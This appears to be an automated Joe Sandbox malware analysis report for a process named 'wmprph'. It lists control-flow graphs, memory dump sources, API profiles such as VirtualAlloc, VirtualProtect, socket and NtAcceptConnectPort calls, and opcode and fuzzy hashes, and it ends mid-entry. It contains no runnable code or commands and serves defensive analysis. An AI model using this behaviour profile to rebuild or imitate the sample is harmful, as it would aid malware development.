                                                                                                                                                                                                                                                                                                              control_flow_graph 457 7df47df422cc-7df47df422f0 call 7df47df41000 460 7df47df422f6-7df47df4230c call 7df47df410c0 457->460 461 7df47df4276d-7df47df4277f 457->461 460->461 464 7df47df42312-7df47df42341 call 7df47df41290 call 7df47df412c8 call 7df47df413a0 460->464 464->461 472 7df47df42347-7df47df4235b 464->472 472->461 474 7df47df42361-7df47df42408 call 7df47df42780 call 7df47df431de 472->474 485 7df47df4240e-7df47df42417 474->485 486 7df47df4274d-7df47df42768 SetTimer 474->486 485->486 487 7df47df4241d-7df47df42434 485->487 486->461 487->486 490 7df47df4243a-7df47df42463 call 7df47df43090 487->490 494 7df47df42744-7df47df42745 490->494 495 7df47df42469-7df47df4246a 490->495 494->486 496 7df47df4246d-7df47df42470 495->496 497 7df47df42737-7df47df42740 496->497 498 7df47df42476-7df47df42479 496->498 497->494 499 7df47df4247f-7df47df42492 498->499 500 7df47df4271c-7df47df42731 498->500 503 7df47df42494-7df47df42497 499->503 504 7df47df424ca-7df47df424dd 499->504 500->496 500->497 503->500 505 7df47df4249d-7df47df424b9 503->505 508 7df47df42516-7df47df42529 504->508 509 7df47df424df-7df47df424e2 504->509 505->500 511 7df47df424bf-7df47df424c5 505->511 514 7df47df4252b-7df47df4252e 508->514 515 7df47df4255e-7df47df42574 508->515 509->500 510 7df47df424e8-7df47df42501 509->510 510->500 516 7df47df42507-7df47df42511 510->516 511->500 514->500 517 7df47df42534-7df47df4254d 514->517 515->500 520 7df47df4257a-7df47df4257d 515->520 516->500 517->500 522 7df47df42553-7df47df42559 517->522 520->500 521 7df47df42583-7df47df42591 call 7df47df4309c 520->521 521->500 525 7df47df42597-7df47df425b7 521->525 522->500 525->500 527 7df47df425bd-7df47df425e0 call 7df47df413e8 525->527 530 7df47df425e6-7df47df425ef 527->530 531 7df47df42713-7df47df42714 527->531 530->531 532 7df47df425f5-7df47df425f8 530->532 531->500 533 7df47df4268e-7df47df42695 532->533 534 7df47df425fe-7df47df42601 532->534 533->532 535 7df47df4269b-7df47df4269e 533->535 536 7df47df42687-7df47df4268c 534->536 537 7df47df42607-7df47df42631 534->537 535->531 538 7df47df426a0-7df47df426c5 535->538 536->533 537->536 541 7df47df42633-7df47df4264c 537->541 538->531 542 7df47df426c7-7df47df426dd 538->542 541->536 544 7df47df4264e-7df47df42684 541->544 542->531 546 7df47df426df-7df47df42710 542->546 544->536 546->531
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000015.00000002.2961719491.00007DF47DF41000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF47DF41000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_7df47df41000_wmprph.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: FunctionProtectTableTimerVirtual
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 2248422592-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 907297c01f2e853a7e6e6be3efaf92a15819b9f7a160a726e89f0d05781fa5e1
                                                                                                                                                                                                                                                                                                              • Instruction ID: 5f3ee381639e7d1f3d145efbf7b83c223f3f82b73d550d56741a4156cb405247
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 907297c01f2e853a7e6e6be3efaf92a15819b9f7a160a726e89f0d05781fa5e1
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 88E14331618A894FEB54EF28D8995AA77F1FF98310F14463ED48BC3291EB34E94987C1
                                                                                                                                                                                                                                                                                                              Function 00000242C8C0C2D0 Relevance: 1.9, APIs: 1, Instructions: 699memoryCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                                              control_flow_graph 549 242c8c0c2d0-242c8c0c30d 550 242c8c0c313-242c8c0c356 call 242c8c16564 * 2 549->550 551 242c8c0c96a-242c8c0c990 call 242c8c149f0 549->551 558 242c8c0c362-242c8c0c365 550->558 559 242c8c0c358-242c8c0c360 550->559 560 242c8c0c367-242c8c0c36f 558->560 561 242c8c0c371-242c8c0c374 558->561 559->558 560->561 562 242c8c0c376-242c8c0c37e 561->562 563 242c8c0c380-242c8c0c399 561->563 562->563 564 242c8c0c3a6-242c8c0c3a9 563->564 565 242c8c0c39b-242c8c0c3a4 563->565 566 242c8c0c3b6-242c8c0c3b9 564->566 567 242c8c0c3ab-242c8c0c3b4 564->567 565->564 568 242c8c0c3c6-242c8c0c3e2 566->568 569 242c8c0c3bb-242c8c0c3c4 566->569 567->566 570 242c8c0c3e4-242c8c0c3ed 568->570 571 242c8c0c3ef-242c8c0c3f2 568->571 569->568 570->571 572 242c8c0c3f4-242c8c0c3fd 571->572 573 242c8c0c3ff-242c8c0c402 571->573 572->573 574 242c8c0c404-242c8c0c40d 573->574 575 242c8c0c40f-242c8c0c42b 573->575 574->575 576 242c8c0c438-242c8c0c43b 575->576 577 242c8c0c42d-242c8c0c436 575->577 578 242c8c0c448-242c8c0c44b 576->578 579 242c8c0c43d-242c8c0c446 576->579 577->576 580 242c8c0c458-242c8c0c473 578->580 581 242c8c0c44d-242c8c0c456 578->581 579->578 582 242c8c0c475-242c8c0c47d 580->582 583 242c8c0c47f-242c8c0c482 580->583 581->580 582->583 584 242c8c0c484-242c8c0c48c 583->584 585 242c8c0c48e-242c8c0c491 583->585 584->585 586 242c8c0c493-242c8c0c49b 585->586 587 242c8c0c49d-242c8c0c4b8 585->587 586->587 588 242c8c0c4c5-242c8c0c4c8 587->588 589 242c8c0c4ba-242c8c0c4c3 587->589 590 242c8c0c4d5-242c8c0c4d8 588->590 591 242c8c0c4ca-242c8c0c4d3 588->591 589->588 592 242c8c0c4e5-242c8c0c501 590->592 593 242c8c0c4da-242c8c0c4e3 590->593 591->590 592->551 594 242c8c0c507-242c8c0c50e 592->594 593->592 594->551 595 242c8c0c514-242c8c0c51d 594->595 595->551 596 242c8c0c523-242c8c0c527 595->596 596->551 597 242c8c0c52d-242c8c0c5fb call 242c8c171d4 call 242c8c17514 * 3 call 242c8c17580 596->597 597->551 608 242c8c0c601-242c8c0c64b call 242c8c16564 * 2 call 242c8c17058 597->608 608->551 615 242c8c0c651-242c8c0c65e 608->615 615->551 616 242c8c0c664-242c8c0c66a 615->616 617 242c8c0c71c-242c8c0c71f 616->617 618 242c8c0c670 616->618 617->551 619 242c8c0c725-242c8c0c730 617->619 620 242c8c0c675-242c8c0c688 618->620 619->551 621 242c8c0c736-242c8c0c7ba call 242c8c0a5d8 call 242c8c0a5e0 * 3 call 242c8c0a5e8 619->621 622 242c8c0c695-242c8c0c699 620->622 623 242c8c0c68a-242c8c0c693 620->623 621->551 645 242c8c0c7c0-242c8c0c874 VirtualAlloc 621->645 624 242c8c0c6a6-242c8c0c6aa 622->624 625 242c8c0c69b-242c8c0c6a4 622->625 623->622 627 242c8c0c6b7-242c8c0c6cd 624->627 628 242c8c0c6ac-242c8c0c6b5 624->628 625->624 631 242c8c0c6da-242c8c0c6de 627->631 632 242c8c0c6cf-242c8c0c6d8 627->632 628->627 634 242c8c0c6eb-242c8c0c6ef 631->634 635 242c8c0c6e0-242c8c0c6e9 631->635 632->631 637 242c8c0c6fc-242c8c0c705 634->637 638 242c8c0c6f1-242c8c0c6fa 634->638 635->634 637->617 640 242c8c0c707-242c8c0c716 637->640 638->637 640->617 640->620 645->551 646 242c8c0c87a-242c8c0c90c call 242c8c01000 645->646 651 242c8c0c967-242c8c0c968 646->651 652 242c8c0c90e-242c8c0c959 646->652 651->551 652->651 655 242c8c0c95b-242c8c0c962 call 242c8c18a4c 652->655 655->651
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000015.00000002.2960328323.00000242C8C01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000242C8C01000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_242c8c01000_wmprph.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 41294f9132f532288ebac11fc5ffb7e2a185503835a2c4f2160672799294d73b
                                                                                                                                                                                                                                                                                                              • Instruction ID: e8744843262d0c910fdd1efb565fa9f7b42c7782583f7d5019652b777b5e7d8e
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41294f9132f532288ebac11fc5ffb7e2a185503835a2c4f2160672799294d73b
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC222530618A548EE72D9B29D8CA2BD77D0FB95302F65466FE4DBC2182DA34D60EC7C1
                                                                                                                                                                                                                                                                                                              Function 00000242C8C12EC8 Relevance: 1.8, APIs: 1, Instructions: 260nativeCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                                              control_flow_graph 657 242c8c12ec8-242c8c12f0f 658 242c8c12f16-242c8c12f19 657->658 659 242c8c12f11-242c8c12f14 657->659 660 242c8c12f1b-242c8c12f20 658->660 661 242c8c12f25-242c8c12f2f 658->661 659->658 659->660 662 242c8c13136-242c8c13157 call 242c8c149f0 660->662 663 242c8c12f38-242c8c12f3b 661->663 664 242c8c12f31-242c8c12f32 661->664 665 242c8c12f3d-242c8c12f4c 663->665 666 242c8c12f4e 663->666 664->663 668 242c8c12f53-242c8c12f65 665->668 666->668 670 242c8c12f92 668->670 671 242c8c12f67-242c8c12f90 NtAcceptConnectPort 668->671 672 242c8c12f97-242c8c12f9e 670->672 671->672 673 242c8c12fe5-242c8c12fe8 672->673 674 242c8c12fa0-242c8c12fa2 672->674 675 242c8c130ac-242c8c130ae 673->675 676 242c8c12fee 673->676 674->673 677 242c8c12fa4-242c8c12faa 674->677 678 242c8c13037-242c8c1303c 675->678 679 242c8c130b0 675->679 680 242c8c12ff0-242c8c12ff3 676->680 681 242c8c12fca-242c8c12fd0 677->681 682 242c8c12fac-242c8c12faf 677->682 687 242c8c130b9 678->687 688 242c8c1303e-242c8c13046 678->688 686 242c8c130be-242c8c130c0 679->686 689 242c8c12ff5-242c8c12ff9 680->689 690 242c8c12ffc-242c8c12fff 680->690 683 242c8c1301e-242c8c13028 681->683 685 242c8c12fd2-242c8c12fd5 681->685 682->683 684 242c8c12fb1-242c8c12fb4 682->684 693 242c8c1302e-242c8c13032 683->693 694 242c8c13131 683->694 691 242c8c12fb6 684->691 692 242c8c12fbd-242c8c12fc0 684->692 695 242c8c12fd7 685->695 696 242c8c12fde-242c8c12fe1 685->696 699 242c8c130c2-242c8c130d7 call 242c8c01000 686->699 700 242c8c13124-242c8c13126 686->700 687->686 697 242c8c13055-242c8c13063 688->697 698 242c8c13048-242c8c13051 688->698 689->690 701 242c8c13006-242c8c1300e 690->701 702 242c8c13001-242c8c13004 690->702 691->692 692->683 704 242c8c12fc2-242c8c12fc8 692->704 693->662 694->662 695->696 696->683 706 242c8c12fe3 696->706 715 242c8c130b2-242c8c130b7 697->715 716 242c8c13065-242c8c13072 697->716 698->697 713 242c8c130e7-242c8c130f7 699->713 714 242c8c130d9-242c8c130de 699->714 700->701 705 242c8c1312c 700->705 701->683 703 242c8c13010-242c8c13013 701->703 702->701 703->683 708 242c8c13015-242c8c13016 703->708 704->683 705->694 706->692 708->683 713->680 717 242c8c130fd-242c8c13105 713->717 714->713 720 242c8c130e0-242c8c130e5 714->720 715->662 718 242c8c13074-242c8c1309c 716->718 719 242c8c1309e 716->719 717->680 721 242c8c1310b-242c8c13110 717->721 722 242c8c130a3-242c8c130a7 718->722 719->722 720->713 723 242c8c1311b-242c8c1311f 720->723 721->680 724 242c8c13116 721->724 722->675 723->680 724->723
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000015.00000002.2960328323.00000242C8C01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000242C8C01000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_242c8c01000_wmprph.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 477f8dc71d31783f34f9248ca41e69be52e3134fae9b2781e769503cf8821e2c
                                                                                                                                                                                                                                                                                                              • Instruction ID: ec8f1cac9cd7a3c146a8c0c1dbf1f06c483838129598586d4ee0af3f0b44dc2c
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 477f8dc71d31783f34f9248ca41e69be52e3134fae9b2781e769503cf8821e2c
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5381D534218A49CBE768DB55D8C877EB3E0FFA4705F92C61EF456C7284DB64DA0C8682
                                                                                                                                                                                                                                                                                                              Function 00000242C8C12CAC Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000015.00000002.2960328323.00000242C8C01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000242C8C01000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_242c8c01000_wmprph.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 3e504d11f5da52f1af1682200719c15ad2bad24be6b07785b1bf4d7c48f26462
                                                                                                                                                                                                                                                                                                              • Instruction ID: 1dd8ec433e6d5d2c9f4529dc871fdc2e84bfb837d5d942fc5e8b8ba5fde48e1a
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e504d11f5da52f1af1682200719c15ad2bad24be6b07785b1bf4d7c48f26462
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D3F0DA74A18B848FDB64EF2CD4C9B59B7E0FBA9301F90855EE84CC3245EB34D8448B86
                                                                                                                                                                                                                                                                                                              Function 00000242C8C12E84 Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000015.00000002.2960328323.00000242C8C01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000242C8C01000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_242c8c01000_wmprph.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: a3b54702dbe03003ef4b69b8382696d02528a9294142f6c5061081efdfa68d71
                                                                                                                                                                                                                                                                                                              • Instruction ID: 58aa6f1e078da9bc4bb2478875f63b7bd350fff237e699ce5f5ec5104cb2fee1
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a3b54702dbe03003ef4b69b8382696d02528a9294142f6c5061081efdfa68d71
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 62E092752086048FDB04DF98CCC5969B7F0EFE9306F414D2EE84ACA1A4D274D68CC682
                                                                                                                                                                                                                                                                                                              Function 00000242C8C12A20 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000015.00000002.2960328323.00000242C8C01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000242C8C01000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_242c8c01000_wmprph.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 62332437ee16da287e3653c526f206484f17471112b3976b2a00ba68a8ac2207
                                                                                                                                                                                                                                                                                                              • Instruction ID: b408359a115626bd389247b17335d56bb5d0580ce043b1e977a29184982d1a6e
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 62332437ee16da287e3653c526f206484f17471112b3976b2a00ba68a8ac2207
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2CD01238A187858BD614EB29C8806197BE1FBEA314F95C61DF88483321E639D5458687
                                                                                                                                                                                                                                                                                                              Function 00000242C8C12DAC Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000015.00000002.2960328323.00000242C8C01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000242C8C01000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_242c8c01000_wmprph.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: f3aebb9c130a7595b6eefcdad82ea6d301f140e42f53323116d57528b48ef3ee
                                                                                                                                                                                                                                                                                                              • Instruction ID: 0ad3bc2e6662fab5584bd1562ea51ec73f781f6ecf54043df5c8102144233abd
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f3aebb9c130a7595b6eefcdad82ea6d301f140e42f53323116d57528b48ef3ee
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 22D01238A187498BD714EB29D9806197BE1FBDA314F95461DF84483350E279D544C6C6
                                                                                                                                                                                                                                                                                                              Function 00000242C8C12D80 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000015.00000002.2960328323.00000242C8C01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000242C8C01000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_242c8c01000_wmprph.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 89f4a05ad4cf7a5c42d1f7300e09080cac91406142c330baf98efa371945559f
                                                                                                                                                                                                                                                                                                              • Instruction ID: 9a8439153a2b272c590224ff76b3a749f99fedd17071d7448dfce1bbc36e935e
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 89f4a05ad4cf7a5c42d1f7300e09080cac91406142c330baf98efa371945559f
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8DD05E28A28A898BDA54F729C98061937E1FBE6304F928618A448C3204E22DD5488287
                                                                                                                                                                                                                                                                                                              Function 00000242C8C12DDC Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              • NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,?,00000242C8C05367), ref: 00000242C8C12DEC
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000015.00000002.2960328323.00000242C8C01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000242C8C01000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_242c8c01000_wmprph.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 09515c4071d5cd1d26304305e5d382a5795874c756b6f30558b0c1d7e16e0e91
                                                                                                                                                                                                                                                                                                              • Instruction ID: d67cd9bec4c0e7b6541873e9e9f0ef1c79ffe9c8a9d7973c382551ae7831ba10
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 09515c4071d5cd1d26304305e5d382a5795874c756b6f30558b0c1d7e16e0e91
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D8C08C1861880B8BEA28B26FCCC472820A0AB5E345FC10040B404C2184F84CC68D939A
                                                                                                                                                                                                                                                                                                              Function 00000242C8C1290C Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000015.00000002.2960328323.00000242C8C01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000242C8C01000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_242c8c01000_wmprph.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: ea9358fbe28cd15c97578867be2afda9ae4f1a6df4f19420141c692e89a91aba
                                                                                                                                                                                                                                                                                                              • Instruction ID: 89954a925f91235e741b4df9dd6c186193df7b5ea8f86bd13b06f95564a95e05
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ea9358fbe28cd15c97578867be2afda9ae4f1a6df4f19420141c692e89a91aba
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 51C08C08A1880A8AEA0AA6AFDCC432830A0AB6E320FC10000A405C2180EE0DC68C4392
                                                                                                                                                                                                                                                                                                              Function 00007DF47DF31438 Relevance: 6.1, APIs: 4, Instructions: 134registryCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000015.00000003.2681625902.00007DF47DF31000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF47DF31000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_3_7df47df31000_wmprph.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: CloseInformationOpenQueryValueVolume
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 4069062851-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 3ebb744f0aebbecadcf06631c3d65907a1788fb7df7ced3004579ef494ef68f9
                                                                                                                                                                                                                                                                                                              • Instruction ID: 39900de043b31615eb992830e8de56757449b7af81d5ea4805f241e47ba7df2e
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ebb744f0aebbecadcf06631c3d65907a1788fb7df7ced3004579ef494ef68f9
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F141227151CA888BE755EB24C899BDBB7F1FB94301F00452EE48BC7191EF78D5088B81
                                                                                                                                                                                                                                                                                                              Function 00000242C8C184C0 Relevance: 6.1, APIs: 4, Instructions: 130networkCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000015.00000002.2960328323.00000242C8C01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000242C8C01000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_242c8c01000_wmprph.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: socket$ErrorModegetsockopt
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 552242919-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: f4e6771871a383ecd65cf7c786fccd009df30cb3b3764fe840cb75ff13171734
                                                                                                                                                                                                                                                                                                              • Instruction ID: 7630e2c745076edd3a41f39a3a1fa0d113ddcea367e766a26590dcb4f3f6be2b
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f4e6771871a383ecd65cf7c786fccd009df30cb3b3764fe840cb75ff13171734
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8341B874618B48CFE758EF28DC9856A77E1FBA9301F51862EE04BC32A1DF389509CB41
                                                                                                                                                                                                                                                                                                              Function 00000242C8C0E2A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74memoryCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000015.00000002.2960328323.00000242C8C01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000242C8C01000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_242c8c01000_wmprph.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                              • String ID: rE\
                                                                                                                                                                                                                                                                                                              • API String ID: 544645111-988334199
                                                                                                                                                                                                                                                                                                              • Opcode ID: 75d6d8eb26df1a839d51af674b3d6b425c3a8640e6788e6840d12e792dd5345f
                                                                                                                                                                                                                                                                                                              • Instruction ID: ff223a734001631b7f980c7bec8cfde852fd01bec04bce512cc60ade4e3eba6d
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 75d6d8eb26df1a839d51af674b3d6b425c3a8640e6788e6840d12e792dd5345f
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E01190313089084BEB49F769E8D5BAD729AFBD8341F90512AE54BC3282DE28CA4D4781
                                                                                                                                                                                                                                                                                                              Function 00000242C8C0BC64 Relevance: 4.6, APIs: 3, Instructions: 110fileCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000015.00000002.2960328323.00000242C8C01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000242C8C01000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_242c8c01000_wmprph.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: File$CloseHandleMappingOpenView
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 2553196624-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: e5e44baeb6ac7a5ef2abf0622d7dcda60392d94986a7d3768f6014d184717f4c
